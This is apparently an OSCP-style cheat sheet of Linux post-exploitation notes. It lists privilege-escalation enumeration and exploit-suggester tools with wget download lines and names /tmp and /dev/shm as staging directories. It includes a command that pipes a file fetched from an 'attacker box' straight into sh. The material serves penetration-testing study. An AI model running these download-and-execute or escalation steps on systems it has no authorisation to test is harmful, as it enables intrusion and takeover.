# Linux post exploitation scripts ## Words of wisdom **Be careful with what scripts you are executing as auto exploitation is totally restricted in exam and you are going to fail if you done this mistake , even without your intention so ALWAYS first check what you running before executing it , (Must give attention to 'auto-exploitation' word in scripts)** ### Execution of script ``` wget http:/// | sh | tee output.txt # This will pull file from attacker box and execute it and also store output to txt file ``` ### Common Location with writable permissions to download and execute scripts ``` /tmp /dev/shm ``` ### bangenum.sh (initial linux enumeration) ``` wget https://raw.githubusercontent.com/bngr/OSCP-Scripts/master/bangenum.sh sed -i -e 's/\r$//' bangenum.sh ./bangenum.sh ``` ### PSPY What is running, any cron jobs any scripts? Use PSPY to find out ``` https://github.com/DominicBreuker/pspy ``` ### linux-smart-enumeration ``` https://github.com/diego-treitos/linux-smart-enumeration ``` ### SUID search ``` https://github.com/Anon-Exploiter/SUID3NUM ``` ### xploit\_installer.py (exploit suggester) ``` wget https://raw.githubusercontent.com/wwong99/pentest-notes/master/scripts/xploit_installer.py USAGE: xploit_installer.py ``` ### Unix Priv checker ``` wget https://raw.githubusercontent.com/pentestmonkey/unix-privesc-check/master/upc.sh ``` ### linux-local-enum.sh ``` wget https://raw.githubusercontent.com/Arr0way/linux-local-enumeration-script/master/linux-local-enum.sh ``` ### linuxprivchecker.py ``` wget https://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.py ``` ### linux-exploit-suggestor.sh ``` wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh ``` ### unix-privesc-check.sh ``` wget https://raw.githubusercontent.com/pentestmonkey/unix-privesc-check/master/upc.sh ``` ### KernelPop Automated kernel vulnerability enumeration and exploitation ``` https://github.com/spencerdodd/kernelpop ```